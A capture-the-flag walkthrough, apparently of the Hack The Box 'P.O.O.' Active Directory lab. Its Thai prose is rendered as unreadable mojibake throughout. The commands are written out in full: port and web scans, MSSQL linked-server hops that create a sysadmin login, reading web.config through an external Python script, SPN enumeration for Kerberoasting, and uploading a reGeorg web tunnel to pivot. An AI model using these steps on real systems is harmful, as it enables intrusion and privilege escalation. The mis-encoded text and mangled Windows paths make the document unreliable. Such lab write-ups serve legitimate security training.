
āđāļāļāļāļāļ§āļēāļĄāļāļĩāđāđāļĢāļēāļāļ°āļ§āļīāđāļāļĢāļēāļ°āļŦāđāđāļāļ·āđāļāđāļĢāļ·āđāļāļāđāļĄāđāđāļāđāđāļāđāđāļāļĢāļ·āđāļāļāļāļąāļāļĢ āđāļāđāđāļāđāļāļŦāđāļāļāļāļāļīāļāļąāļāļīāļāļēāļĢāļāļāļēāļāđāļĨāđāļāļāļąāđāļāļŦāļĄāļāļāļēāļāđāļāļāđ .
āļāļēāļĄāļāļĩāđāļĢāļ°āļāļļāđāļ§āđāđāļāļāļģāļāļāļīāļāļēāļĒ POO āđāļāđāļĢāļąāļāļāļēāļĢāļāļāļāđāļāļāļĄāļēāđāļāļ·āđāļāļāļāļŠāļāļāļāļąāļāļĐāļ°āđāļāļāļļāļāļāļąāđāļāļāļāļāļāļāļāļāļēāļĢāđāļāļĄāļāļĩāđāļāļŠāļ āļēāļāđāļ§āļāļĨāđāļāļĄ Active Directory āļāļāļēāļāđāļĨāđāļ āđāļāđāļēāļŦāļĄāļēāļĒāļāļ·āļāļāļēāļĢāļāļĢāļ°āļāļĩāļāļĢāļ°āļāļāļĄāđāļŪāļŠāļāđāļāļĩāđāļĄāļĩāļāļĒāļđāđ āđāļāļīāđāļĄāļĢāļ°āļāļąāļāļŠāļīāļāļāļīāđ āđāļĨāļ°āđāļāļāļĩāđāļŠāļļāļāļāđāļāļĢāļ°āļāļĩāļāļĢāļ°āļāļāļĄāļāļąāđāļāđāļāđāļĄāļāļāđāļ§āļĒāļāļēāļĢāļĢāļ§āļāļĢāļ§āļĄ 5 āđāļāļĨāđāļāđāļāļāļĢāļ°āļāļ§āļāļāļēāļĢ
āļāļēāļĢāđāļāļ·āđāļāļĄāļāđāļāļāļąāļāļŦāđāļāļāļāļāļīāļāļąāļāļīāļāļēāļĢāļāđāļēāļ VPN āļāļāđāļāļ°āļāļģāļ§āđāļēāļāļĒāđāļēāđāļāļ·āđāļāļĄāļāđāļāļāļēāļāļāļāļĄāļāļīāļ§āđāļāļāļĢāđāļāļĩāđāđāļāđāļāļēāļāđāļāđāļŦāļĢāļ·āļāļāļēāļāđāļŪāļŠāļāđāļāļĩāđāļĄāļĩāļāđāļāļĄāļđāļĨāļŠāļģāļāļąāļāļŠāļģāļŦāļĢāļąāļāļāļļāļ āđāļāļ·āđāļāļāļāļēāļāļāļļāļāđāļāđāļēāļŠāļđāđāđāļāļĢāļ·āļāļāđāļēāļĒāļŠāđāļ§āļāļāļąāļ§āļāļąāļāļāļāļāļĩāđāļĢāļđāđāļāļēāļāļāļĒāđāļēāļāđāļāļĩāđāļĒāļ§āļāļąāļāļāļ§āļēāļĄāļāļĨāļāļāļ āļąāļĒāļāļāļāļāđāļāļĄāļđāļĨ ð
āļāđāļāļĄāļđāļĨāļāļāļāđāļāļĢ
āđāļāļ·āđāļāđāļŦāđāļāļļāļāļāđāļāļŦāļēāļāđāļāļĄāļđāļĨāđāļāļĩāđāļĒāļ§āļāļąāļāļāļāļāļ§āļēāļĄ āļāļāļāļāđāđāļ§āļĢāđ āđāļĨāļ°āļāđāļāļĄāļđāļĨāļāļ·āđāļ āđ āđāļŦāļĄāđ āļāļąāļāļāļķāļāļŠāļĢāđāļēāļāļāļķāđāļ Ðļ āđāļāļāļ·āđāļāļāļĩāđāļāļāļ IIKB āļāļģāļāļāļŠāđāļ§āļāļāļąāļ§ āļāļģāļāļēāļĄ āļāđāļāđāļŠāļāļāđāļāļ° āđāļĨāļ°āļāđāļāđāļŠāļāļāđāļāļ°āļāļāļāļāļļāļ .
āļāđāļāļĄāļđāļĨāļāļąāđāļāļŦāļĄāļāļāļąāļāļāļģāļāļķāđāļāđāļāļ·āđāļāļāļēāļĢāļĻāļķāļāļĐāļēāđāļāđāļēāļāļąāđāļ āļāļđāđāđāļāļĩāļĒāļāđāļāļāļŠāļēāļĢāļāļĩāđāđāļĄāđāļĢāļąāļāļāļīāļāļāļāļāļāđāļāļāļ§āļēāļĄāđāļŠāļĩāļĒāļŦāļēāļĒāđāļ āđ āļāļĩāđāđāļāļīāļāļāļąāļāļāļļāļāļāļĨāđāļāļāļąāļāđāļāđāļāļāļĨāļĄāļēāļāļēāļāļāļēāļĢāđāļāđāļāļ§āļēāļĄāļĢāļđāđāđāļĨāļ°āļ§āļīāļāļĩāļāļēāļĢāļāļĩāđāđāļāđāļĢāļąāļāļāļēāļāļāļēāļĢāļĻāļķāļāļĐāļēāđāļāļāļŠāļēāļĢāļāļĩāđ
āđāļāļ°āļāļģ
endgame āļāļĩāđāļāļĢāļ°āļāļāļāļāđāļ§āļĒāļŠāļāļāđāļāļĢāļ·āđāļāļāđāļĨāļ°āļĄāļĩ 5 āļāļ

āļāļģāļāļāļīāļāļēāļĒāđāļĨāļ°āļāļĩāđāļāļĒāļđāđāļāļāļāđāļŪāļŠāļāđāļāļĩāđāļĄāļĩāļāļĒāļđāđāļāļ°āđāļāđāļĢāļąāļāļāđāļ§āļĒ

āļĄāļēāđāļĢāļīāđāļĄāļāļąāļāđāļĨāļĒ!
āļāļāļĢāļĩāļāļāļ
āđāļāļĢāļ·āđāļāļāļāļĩāđāļĄāļĩāļāļĩāđāļāļĒāļđāđ IP 10.13.38.11 āļāļķāđāļāļāļąāļāđāļāļīāđāļĄāđāļ /etc/hosts
10.13.38.11 poo.htb
āļāļąāđāļāļāļāļāđāļĢāļāļāļ·āļāļāļēāļĢāļŠāđāļāļāļāļāļĢāđāļāļāļĩāđāđāļāļīāļāļāļĒāļđāđ āđāļāļ·āđāļāļāļāļēāļāļāļēāļĢāļŠāđāļāļāļāļāļĢāđāļāļāļąāđāļāļŦāļĄāļāļāđāļ§āļĒ nmap āđāļāđāđāļ§āļĨāļēāļāļēāļ āļāļąāļāļāļ°āļāļģāļāļēāļĢāļŠāđāļāļāļāđāļ§āļĒ Masscan āļāđāļāļ āđāļĢāļēāļŠāđāļāļāļāļāļĢāđāļ TCP āđāļĨāļ° UDP āļāļąāđāļāļŦāļĄāļāļāļēāļāļāļīāļāđāļāļāļĢāđāđāļāļ tun0 āļāļĩāđ 500pps
sudo masscan -e tun0 -p1-65535,U:1-65535 10.13.38.11 --rate=500 
āļāļāļāļāļĩāđ āđāļāļ·āđāļāļĢāļąāļāļāđāļāļĄāļđāļĨāđāļāļĒāļĨāļ°āđāļāļĩāļĒāļāđāļāļīāđāļĄāđāļāļīāļĄāđāļāļĩāđāļĒāļ§āļāļąāļāļāļĢāļīāļāļēāļĢāļāļĩāđāļāļģāļāļēāļāļāļāļāļāļĢāđāļ āđāļĢāļēāļĄāļēāļŠāđāļāļāļāđāļ§āļĒāļāļąāļ§āđāļĨāļ·āļāļ -A
nmap -A poo.htb -p80,1433 
āļāļąāļāļāļąāđāļāđāļĢāļēāļāļķāļāļĄāļĩāļāļĢāļīāļāļēāļĢ IIS āđāļĨāļ° MSSQL āđāļāļāļĢāļāļĩāļāļĩāđ āđāļĢāļēāļāļ°āļāđāļāļŦāļēāļāļ·āđāļ DNS āļāļĩāđāđāļāđāļāļĢāļīāļāļāļāļāđāļāđāļĄāļāđāļĨāļ°āļāļāļĄāļāļīāļ§āđāļāļāļĢāđ āļāļāđāļ§āđāļāđāļāļīāļĢāđāļāđāļ§āļāļĢāđ āđāļĢāļēāđāļāđāļĢāļąāļāļāļēāļĢāļāđāļāļāļĢāļąāļāļāļēāļāđāļŪāļĄāđāļāļ IIS

āļĄāļēāļ§āļāļāđāļģāđāļāđāļĢāđāļāļāļāļĢāļĩāļāļąāļ āļāļąāļāđāļāđ gobuster āļŠāļģāļŦāļĢāļąāļāļŠāļīāđāļāļāļĩāđ āđāļāļāļēāļĢāļēāļĄāļīāđāļāļāļĢāđāđāļĢāļēāļĢāļ°āļāļļāļāļģāļāļ§āļāļŠāļāļĢāļĩāļĄ 128 (-t), URL (-u), āļāļāļāļēāļāļļāļāļĢāļĄ (-w) āđāļĨāļ°āļŠāđāļ§āļāļāļĒāļēāļĒāļāļĩāđāđāļĢāļēāļŠāļāđāļ (-x)
gobuster dir -t 128 -u poo.htb -w /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt -x php,aspx,html 
āļāļąāļāļāļąāđāļāđāļĢāļēāļāļķāļāļĄāļĩāļāļēāļĢāļāļĢāļ§āļāļŠāļāļāļŠāļīāļāļāļīāđ HTTP āļŠāļģāļŦāļĢāļąāļāđāļāđāļĢāđāļāļāļāļĢāļĩ /admin āļĢāļ§āļĄāļāļķāļāđāļāļĨāđāļāļ·āđāļāļāļĩāđāđāļāđāļāļāđāļāļĄāļđāļĨāļāļĢāļīāļāļēāļĢāđāļāļŠāļāđāļāđāļāļ .DS_Store āļāļĩāđāļāļĢāđāļāļĄāđāļāđāļāļēāļ .DS_Store āļāļ·āļāđāļāļĨāđāļāļĩāđāđāļāđāļāļāļēāļĢāļāļąāđāļāļāđāļēāļāļāļāļāļđāđāđāļāđāļŠāļģāļŦāļĢāļąāļāđāļāļĨāđāļāļāļĢāđ āđāļāđāļ āļĢāļēāļĒāļāļēāļĢāđāļāļĨāđ āļāļģāđāļŦāļāđāļāđāļāļāļāļ āļ āļēāļāļāļ·āđāļāļŦāļĨāļąāļāļāļĩāđāđāļĨāļ·āļāļ āđāļāļĨāđāļāļąāļāļāļĨāđāļēāļ§āļāļēāļāđāļāļāļĒāļđāđāđāļāđāļāđāļĢāđāļāļāļāļĢāļĩāđāļ§āđāļāđāļāļīāļĢāđāļāđāļ§āļāļĢāđāļāļāļāļāļąāļāļāļąāļāļāļēāđāļ§āđāļ āļāļąāļāļāļąāđāļāđāļĢāļēāļāļķāļāđāļāđāļĢāļąāļāļāđāļāļĄāļđāļĨāđāļāļĩāđāļĒāļ§āļāļąāļāđāļāļ·āđāļāļŦāļēāļāļāļāđāļāđāļĢāđāļāļāļāļĢāļĩ āļŠāļģāļŦāļĢāļąāļāļŠāļīāđāļāļāļĩāđāļāļļāļāļŠāļēāļĄāļēāļĢāļāđāļāđ .
python3 dsstore_crawler.py -i http://poo.htb/ 
āđāļĢāļēāđāļāđāļĢāļąāļāđāļāļ·āđāļāļŦāļēāļāļāļāđāļāđāļĢāđāļāļāļāļĢāļĩ āļŠāļīāđāļāļāļĩāđāļāđāļēāļŠāļāđāļāļāļĩāđāļŠāļļāļāļāļ·āļāđāļāđāļĢāđāļāļāļāļĢāļĩ /dev āļāļķāđāļāđāļĢāļēāļŠāļēāļĄāļēāļĢāļāļāļđāļāļāļĢāđāļŠāđāļĨāļ°āđāļāļĨāđ db āđāļāļŠāļāļāļŠāļēāļāļēāđāļāđ āđāļāđāđāļĢāļēāļŠāļēāļĄāļēāļĢāļāđāļāđāļāļąāļāļāļĢāļ° 6 āļāļąāļ§āđāļĢāļāļāļāļāļāļ·āđāļāđāļāļĨāđāđāļĨāļ°āđāļāđāļĢāđāļāļāļāļĢāļĩāđāļāđ āļŦāļēāļāļāļĢāļīāļāļēāļĢāļĄāļĩāļāļ§āļēāļĄāđāļŠāļĩāđāļĒāļāļāđāļ IIS ShortName āļāļļāļāļŠāļēāļĄāļēāļĢāļāļāļĢāļ§āļāļŠāļāļāļāđāļāļāđāļŦāļ§āđāļāļĩāđāđāļāđāđāļāļĒāđāļāđ .

āđāļĨāļ°āđāļĢāļēāļāļāđāļāļĨāđāļāđāļāļāļ§āļēāļĄāļŦāļāļķāđāļāđāļāļĨāđāļāļĩāđāļāļķāđāļāļāđāļāļāđāļ§āļĒ "poo_co" āđāļāļĒāđāļĄāđāļĢāļđāđāļ§āđāļēāļāđāļāļāļāļģāļāļĒāđāļēāļāđāļĢāļāđāļāđāļ āļāļąāļāđāļāļĩāļĒāļāđāļĨāļ·āļāļāļāļēāļāļāļāļāļēāļāļļāļāļĢāļĄāļāļāļāđāļāđāļĢāđāļāļāļāļĢāļĩāļāļāļāļāļģāļāļąāđāļāļŦāļĄāļāļāļĩāđāļāļķāđāļāļāđāļāļāđāļ§āļĒ "co"
cat /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt | grep -i "^co" > co_words.txtāđāļĨāļ°āļ§āļāļāđāļģāļāđāļ§āļĒ wfuzz
wfuzz -w ./co_words.txt -u "http://poo.htb/dev/dca66d38fd916317687e1390a420c3fc/db/poo_FUZZ.txt" --hc 404 
āđāļĨāļ°āļāđāļāļŦāļēāļāļģāļāļĩāđāđāļŦāļĄāļēāļ°āļŠāļĄ! āđāļĢāļēāļāļđāļāļĩāđāđāļāļĨāđāļāļĩāđ āļāļąāļāļāļķāļāļāđāļāļĄāļđāļĨāļāļĢāļ°āļāļģāļāļąāļ§ (āļāļąāļāļŠāļīāļāđāļāļĒāļāļēāļĢāļēāļĄāļīāđāļāļāļĢāđ DBNAME āļāļķāđāļāļĄāļēāļāļēāļ MSSQL)

āđāļĢāļēāļĄāļāļāļāļāđāļĨāļ°āđāļĢāļēāļāđāļēāļ§āļŦāļāđāļē 20%

āļŦāļķ āļāļąāļāļāļ
āđāļĢāļēāđāļāļ·āđāļāļĄāļāđāļāļāļąāļ MSSQL āļāļąāļāđāļāđ DBeaver

āđāļĢāļēāđāļĄāđāļāļāļŠāļīāđāļāļāļĩāđāļāđāļēāļŠāļāđāļāđāļāļāļēāļāļāđāļāļĄāļđāļĨāļāļĩāđ āļĨāļāļāļŠāļĢāđāļēāļāļāļąāļ§āđāļāđāđāļ SQL āđāļĨāļ°āļāļĢāļ§āļāļŠāļāļāļ§āđāļēāļāļđāđāđāļāđāļāļ·āļāļāļ°āđāļĢ
SELECT name FROM master..syslogins; 
āđāļĢāļēāļĄāļĩāļāļđāđāđāļāđāļŠāļāļāļāļ āļĄāļēāđāļāđāļāļŠāļīāļāļāļīāļāļīāđāļĻāļĐāļāļąāļāđāļāļāļ°
SELECT is_srvrolemember('sysadmin'), is_srvrolemember('dbcreator'), is_srvrolemember('bulkadmin'), is_srvrolemember('diskadmin'), is_srvrolemember('processadmin'), is_srvrolemember('serveradmin'), is_srvrolemember('setupadmin'), is_srvrolemember('securityadmin'); 
āļāļąāļāļāļąāđāļāļāļķāļāđāļĄāđāļĄāļĩāļŠāļīāļāļāļīāļāļīāđāļĻāļĐāđāļāđ āļĄāļēāļāļđāđāļāļīāļĢāđāļāđāļ§āļāļĢāđāļāļĩāđāđāļāļ·āđāļāļĄāđāļĒāļāļāļąāļ āļāļąāļāđāļāļĩāļĒāļāđāļāļĩāđāļĒāļ§āļāļąāļāđāļāļāļāļīāļāļāļĩāđāļāļĒāđāļēāļāļĨāļ°āđāļāļĩāļĒāļ .
SELECT * FROM master..sysservers; 
āļāļąāļāļāļąāđāļāđāļĢāļēāļāļķāļāļāļ SQL Server āļāļ·āđāļ āļāļĢāļ§āļāļŠāļāļāļāļēāļĢāļāļģāļāļēāļāļāļāļāļāļģāļŠāļąāđāļāļāļāđāļāļīāļĢāđāļāđāļ§āļāļĢāđāļāļĩāđāđāļāļĒāđāļāđ openquery()
SELECT version FROM openquery("COMPATIBILITYPOO_CONFIG", 'select @@version as version'); 
āđāļĨāļ°āđāļĢāļēāļĒāļąāļāļŠāļēāļĄāļēāļĢāļāļŠāļĢāđāļēāļ Query Tree āđāļāđāļāļĩāļāļāđāļ§āļĒ
SELECT version FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT version FROM openquery("COMPATIBILITYPOO_PUBLIC", ''select @@version as version'');');āļāļ§āļēāļĄāļāļĢāļīāļāļāđāļāļ·āļāđāļĄāļ·āđāļāđāļĢāļēāļŠāđāļāļāļģāļāļāđāļāļĒāļąāļāđāļāļīāļĢāđāļāđāļ§āļāļĢāđāļāļĩāđāđāļāļ·āđāļāļĄāđāļĒāļ āļāļģāļāļāļāļąāđāļāļāļ°āļāļđāļāļāļģāđāļāļīāļāļāļēāļĢāđāļāļāļĢāļīāļāļāļāļāļāļāļđāđāđāļāđāļĢāļēāļĒāļāļ·āđāļ! āļĄāļēāļāļđāļāļąāļāļ§āđāļēāđāļĢāļēāļāļģāļĨāļąāļāđāļĢāļĩāļĒāļāđāļāđāļāļĢāļīāļāļāļāļđāđāđāļāđāđāļāļāļāđāļāļīāļĢāđāļāđāļ§āļāļĢāđāļāļĩāđāđāļāļ·āđāļāļĄāđāļĒāļ
SELECT name FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT user_name() as name'); 
āđāļĨāļ°āļāļāļāļāļĩāđāđāļĢāļēāļĄāļēāļāļđāļāļąāļāļ§āđāļēāļāļģāļāļāļāļēāļāđāļāļīāļĢāđāļāđāļ§āļāļĢāđāļāļĩāđāđāļāļ·āđāļāļĄāđāļĒāļāđāļāļĒāļąāļāļāļāļāđāļĢāļēāļāļąāđāļāļāļđāļāļāļģāđāļāļīāļāļāļēāļĢāđāļāļāļĢāļīāļāļāđāļ!
SELECT * FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT name FROM openquery("COMPATIBILITYPOO_PUBLIC", ''SELECT user_name() as name'');'); 
āļāļąāļāļāļąāđāļāļāļķāļāđāļāđāļāļāļĢāļīāļāļ DBO āļāļĩāđāļāđāļāļāļĄāļĩāļŠāļīāļāļāļīāđāļāļąāđāļāļŦāļĄāļ āļāļĢāļ§āļāļŠāļāļāļŠāļīāļāļāļīāđāđāļāļāļĢāļāļĩāļāļĩāđāļĄāļĩāļāļēāļĢāļĢāđāļāļāļāļāļāļēāļāđāļāļīāļĢāđāļāđāļ§āļāļĢāđāļāļĩāđāđāļāļ·āđāļāļĄāđāļĒāļ
SELECT * FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT * FROM openquery("COMPATIBILITYPOO_PUBLIC", ''SELECT is_srvrolemember(''''sysadmin''''), is_srvrolemember(''''dbcreator''''), is_srvrolemember(''''bulkadmin''''), is_srvrolemember(''''diskadmin''''), is_srvrolemember(''''processadmin''''), is_srvrolemember(''''serveradmin''''), is_srvrolemember(''''setupadmin''''), is_srvrolemember(''''securityadmin'''')'')'); 
āļāļĒāđāļēāļāļāļĩāđāļāļļāļāđāļŦāđāļ āđāļĢāļēāļĄāļĩāļŠāļīāļāļāļīāđāļāļąāđāļāļŦāļĄāļ! āļĄāļēāļŠāļĢāđāļēāļāļāļđāđāļāļđāđāļĨāļĢāļ°āļāļāļāļāļāđāļĢāļēāđāļāļāļāļĩāđ āđāļāđāļāļ§āļāđāļāļēāđāļĄāđāđāļŦāđāļāđāļēāļ openquery āļĄāļēāļāļģāļāđāļēāļ EXECUTE AT āļāļąāļāđāļāļāļ°
EXECUTE('EXECUTE(''CREATE LOGIN [ralf] WITH PASSWORD=N''''ralfralf'''', DEFAULT_DATABASE=[master], CHECK_EXPIRATION=OFF, CHECK_POLICY=OFF'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
EXECUTE('EXECUTE(''CREATE USER [ralf] FOR LOGIN [ralf]'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
EXECUTE('EXECUTE(''ALTER SERVER ROLE [sysadmin] ADD MEMBER [ralf]'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
EXECUTE('EXECUTE(''ALTER ROLE [db_owner] ADD MEMBER [ralf]'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";āđāļĨāļ°āļāļāļāļāļĩāđāđāļĢāļēāđāļāļ·āđāļāļĄāļāđāļāļāļąāļāļāđāļāļĄāļđāļĨāļĢāļąāļāļĢāļāļāļāļāļāļāļđāđāđāļāđāđāļŦāļĄāđ āļŠāļąāļāđāļāļāļāļēāļāļāđāļāļĄāļđāļĨāđāļāļĨāđāļāđāļŦāļĄāđ

āđāļĢāļēāļĄāļāļāļāļāļāļĩāđāđāļĨāļ°āļāđāļēāļ§āļāđāļāđāļ

āļāļāļāļāļĒāļŦāļĨāļąāļ
āļĄāļēāļĢāļąāļāđāļāļĨāļĨāđāđāļāļĒāđāļāđ MSSQL āļāļąāļāđāļāđ mssqlclient āļāļēāļāđāļāđāļāđāļāļ Impactet
mssqlclient.py ralf:ralfralf@poo.htb -db POO_PUBLIC 
āđāļĢāļēāļāđāļāļāđāļāđāļĢāļąāļāļĢāļŦāļąāļŠāļāđāļēāļāđāļĨāļ°āļŠāļīāđāļāđāļĢāļāļāļĩāđāđāļĢāļēāļāļāđāļĨāđāļ§āļāļ·āļāđāļāļāđ āļāļąāļāļāļąāđāļāđāļĢāļēāļāļķāļāļāđāļāļāļāļēāļĢāļāļēāļĢāļāļģāļŦāļāļāļāđāļēāđāļ§āđāļāđāļāļīāļĢāđāļāđāļ§āļāļĢāđ (āđāļāđāļāđāļāđāļĄāđāđāļāđāļāļĩāđāļāļ°āđāļĒāļāđāļāļĨāļĨāđāļāļĩāđāļŠāļ°āļāļ§āļ āđāļŦāđāļāđāļāđāļāļąāļāļ§āđāļēāđāļāļĢāđāļ§āļāļĨāļĨāđāļāļģāļĨāļąāļāļāļģāļāļēāļāļāļĒāļđāđ)

āđāļāđāļāļēāļĢāđāļāđāļēāļāļķāļāļāļđāļāļāļāļīāđāļŠāļ āđāļĄāđāļ§āđāļēāđāļĢāļēāļāļ°āļŠāļēāļĄāļēāļĢāļāļāđāļēāļāđāļāļĨāđāļāļēāļ MSSQL āđāļāđ āđāļāđāđāļĢāļēāļāđāļāđāļāļāļĢāļđāđāļ§āđāļēāļĄāļĩāļāļēāļĢāļāļģāļŦāļāļāļāđāļēāļ āļēāļĐāļēāđāļāļĢāđāļāļĢāļĄāļāļ°āđāļĢ āđāļĨāļ°āđāļāđāļāđāļĢāđāļāļāļāļĢāļĩ MSSQL āđāļĢāļēāļāļāļ§āđāļēāļĄāļĩ Python

āļāļēāļāļāļąāđāļāđāļĄāđāļĄāļĩāļāļąāļāļŦāļēāđāļāļāļēāļĢāļāđāļēāļāđāļāļĨāđ web.config
EXEC sp_execute_external_script
@language = N'Python',
@script = "print(open('C:inetpubwwwrootweb.config').read())" 
āđāļĄāļ·āđāļāļāļāļāđāļāļĄāļđāļĨāļĢāļąāļāļĢāļāļāđāļĨāđāļ§ āđāļŦāđāđāļāļāļĩāđ /admin āđāļĨāļ°āļĢāļąāļāļāļ


āļāļąāđāļāļŦāļĨāļąāļāļāļąāļāļāļ
āđāļāļāļ§āļēāļĄāđāļāđāļāļāļĢāļīāļ āļĄāļĩāļāļ§āļēāļĄāđāļĄāđāļŠāļ°āļāļ§āļāļāļēāļāļāļĢāļ°āļāļēāļĢāļāļēāļāļāļēāļĢāđāļāđāđāļāļĢāđāļ§āļāļĨāļĨāđ āđāļāđāđāļĄāļ·āđāļāļāļđāļāđāļēāļāļāļēāļĢāļāļąāđāļāļāđāļēāđāļāļĢāļ·āļāļāđāļēāļĒ āđāļĢāļēāļŠāļąāļāđāļāļāđāļŦāđāļāļ§āđāļēāļĄāļĩāļāļēāļĢāđāļāđāđāļāļĢāđāļāļāļāļĨ IPv6 āļāđāļ§āļĒ!

āđāļāļīāđāļĄāļāļĩāđāļāļĒāļđāđāļāļĩāđāđāļ /etc/hosts
dead:babe::1001 poo6.htb
āļĨāļāļāļŠāđāļāļāđāļŪāļŠāļāđāļāļĩāļāļāļĢāļąāđāļ āđāļāđāļāļĢāļēāļ§āļāļĩāđāļāđāļēāļ IPv6

āđāļĨāļ°āļāļĢāļīāļāļēāļĢ WinRM āļāļĢāđāļāļĄāđāļāđāļāļēāļāļāļ IPv6 āļĄāļēāđāļāļ·āđāļāļĄāļāđāļāļāļąāļāļāđāļāļĄāļđāļĨāļĢāļąāļāļĢāļāļāļāļĩāđāļāļ

āļĄāļĩāļāļāļāļĒāļđāđāļāļāđāļāđāļ° āļĄāļāļāđāļŦāđ

P00ned āđāļāļĨāđāļ
āļŦāļĨāļąāļāļāļēāļāļāļĢāļ°āđāļ§āļāļāļĒāļđāđāļāļąāļāđāļāđāļēāļāđāļēāļ āđāļĢāļēāđāļĄāđāļāļāļāļ°āđāļĢāļāļīāđāļĻāļĐ āļāļēāļāļāļąāđāļāļāļķāļāļāļąāļāļŠāļīāļāđāļāļāđāļāļŦāļēāļāđāļāļĄāļđāļĨāļāļĢāļ°āļāļģāļāļąāļ§āļāļĩāļāļāļĢāļąāđāļ (āļāļąāļāđāļāļĩāļĒāļāđāļāļŦāļąāļ§āļāđāļāļāļĩāđāļāđāļ§āļĒ ). āđāļāđāļāļąāļāđāļĄāđāļŠāļēāļĄāļēāļĢāļāļĢāļąāļ SPN āļāļąāđāļāļŦāļĄāļāļāļēāļāļĢāļ°āļāļāļāđāļēāļ WinRM
setspn.exe -T intranet.poo -Q */* 
āļĨāļāļāļĢāļąāļāļāļģāļŠāļąāđāļāļāđāļēāļ MSSQL

āļāđāļ§āļĒāļ§āļīāļāļĩāļāļĩāđ āđāļĢāļēāđāļāđāļĢāļąāļ SPN āļāļāļāļāļđāđāđāļāđ p00_hr āđāļĨāļ° p00_adm āļāļķāđāļāļŦāļĄāļēāļĒāļāļ§āļēāļĄāļ§āđāļēāļāļ§āļāđāļāļēāđāļŠāļĩāđāļĒāļāļāđāļāļāļēāļĢāļāļđāļāđāļāļĄāļāļĩ āđāļāđāļ Kerberoasting āđāļāļĢāļ°āļĒāļ°āļŠāļąāđāļ āđāļĢāļēāļŠāļēāļĄāļēāļĢāļāļĢāļąāļāđāļŪāļāļāļāļāļĢāļŦāļąāļŠāļāđāļēāļāđāļāđ
āļāđāļāļāļāļ·āđāļāļāļļāļāļāđāļāļāđāļāđāļĢāļąāļāđāļāļĨāļĨāđāļāļĩāđāđāļŠāļāļĩāļĒāļĢāđāļāļāļēāļĄāļāļāļāļāļđāđāđāļāđ MSSQL āđāļāđāđāļāļ·āđāļāļāļāļēāļāđāļĢāļēāđāļāđāļēāļāļķāļāđāļāđāļāļģāļāļąāļ āđāļĢāļēāļāļķāļāđāļāļ·āđāļāļĄāļāđāļāļāļąāļāđāļŪāļŠāļāđāļāđāļēāļāļāļāļĢāđāļ 80 āđāļĨāļ° 1433 āđāļāđāļēāļāļąāđāļ āđāļāđāļŠāļēāļĄāļēāļĢāļāļāļļāļāļāļļāđāļĄāļāļāđāļāđāļēāļāļāļāļĢāđāļ 80 āđāļāđ! āļŠāļģāļŦāļĢāļąāļāļŠāļīāđāļāļāļĩāđāđāļĢāļēāļāļ°āđāļāđ . āļĄāļēāļāļąāļāđāļŦāļĨāļāđāļāļĨāđ tunnel.aspx āđāļāļĒāļąāļāđāļŪāļĄāđāļāđāļĢāđāļāļāļāļĢāļĩāļāļāļāđāļ§āđāļāđāļāļīāļĢāđāļāđāļ§āļāļĢāđ - C: inetpubwwwroot

āđāļāđāđāļĄāļ·āđāļāđāļĢāļēāļāļĒāļēāļĒāļēāļĄāđāļāđāļēāļāļķāļāđāļĢāļēāđāļāđāļĢāļąāļāļāđāļāļāļīāļāļāļĨāļēāļ 404 āļāļķāđāļāļŦāļĄāļēāļĒāļāļ§āļēāļĄāļ§āđāļēāđāļāļĨāđ *.aspx āļāļ°āđāļĄāđāļāļđāļāđāļĢāļĩāļĒāļāđāļāđāļāļēāļ āļŦāļēāļāļāđāļāļāļāļēāļĢāđāļĢāļĩāļĒāļāđāļāđāđāļāļĨāđāļāļĩāđāļĄāļĩāļāļēāļĄāļŠāļāļļāļĨāđāļŦāļĨāđāļēāļāļĩāđ āđāļŦāđāļāļīāļāļāļąāđāļ ASP.NET 4.5 āļāļąāļāļāļĩāđ
dism /online /enable-feature /all /featurename:IIS-ASPNET45 
![]()
āđāļĨāļ°āļāļāļāļāļĩāđāđāļĄāļ·āđāļāđāļāđāļēāđāļāļāļĩāđ tunnel.aspx āđāļĢāļēāļāđāđāļāđāļāļģāļāļāļāļ§āđāļēāļāļļāļāļāļĒāđāļēāļāļāļĢāđāļāļĄāđāļĨāđāļ§
![]()
āđāļĢāļēāļĄāļēāđāļĢāļīāđāļĄāļŠāđāļ§āļāđāļāļĨāđāļāļāļāđāļāļāļāđāļāļāļāļĨāļīāđāļāļāļąāļāļāļķāđāļāļāļ°āļŠāđāļāļāđāļāļāļĢāļēāļāļāļīāļ āđāļĢāļēāļāļ°āļŠāđāļāļāđāļāļāļēāļĢāļĢāļąāļāļŠāđāļāļāđāļāļĄāļđāļĨāļāļąāđāļāļŦāļĄāļāļāļēāļāļāļāļĢāđāļ 5432 āđāļāļĒāļąāļāđāļāļīāļĢāđāļāđāļ§āļāļĢāđ
python ./reGeorgSocksProxy.py -p 5432 -u http://poo.htb/tunnel.aspx 
āđāļĨāļ°āđāļĢāļēāđāļāđāļāļĢāđāļāļāļāļĩāđāļāļāđāļāļ·āđāļāļŠāđāļāļāļĢāļēāļāļāļīāļāļāļāļāđāļāļāļāļĨāļīāđāļāļāļąāļāđāļāđ āļāđāļēāļāļāļĢāđāļāļāļāļĩāļāļāļāđāļĢāļē āļĄāļēāđāļāļīāđāļĄāļāļĢāđāļāļāļāļĩāļāļĩāđāđāļāđāļāļĨāđāļāļāļāļāļīāļāļđāđāļĢāļāļąāļ /etc/proxychains.conf

āļāļāļāļāļĩāđāđāļĢāļēāļĄāļēāļāļąāļāđāļŦāļĨāļāđāļāļĢāđāļāļĢāļĄāđāļāļĒāļąāļāđāļāļīāļĢāđāļāđāļ§āļāļĢāđ āļāļķāđāļāđāļĢāļēāļāļ°āļŠāļĢāđāļēāļāļāļēāļĢāļāļđāļāđāļāļĨāļĨāđāļāļĩāđāđāļŠāļāļĩāļĒāļĢāđāļĨāļ°āļŠāļāļĢāļīāļāļāđ āļāļķāđāļāđāļĢāļēāļāļ°āļāļģāļāļēāļĢāđāļāļĄāļāļĩ Kerberoasting

āļāļāļāļāļĩāđāļāđāļēāļ MSSQL āđāļĢāļēāđāļāļīāļāļāļąāļ§āļāļąāļ
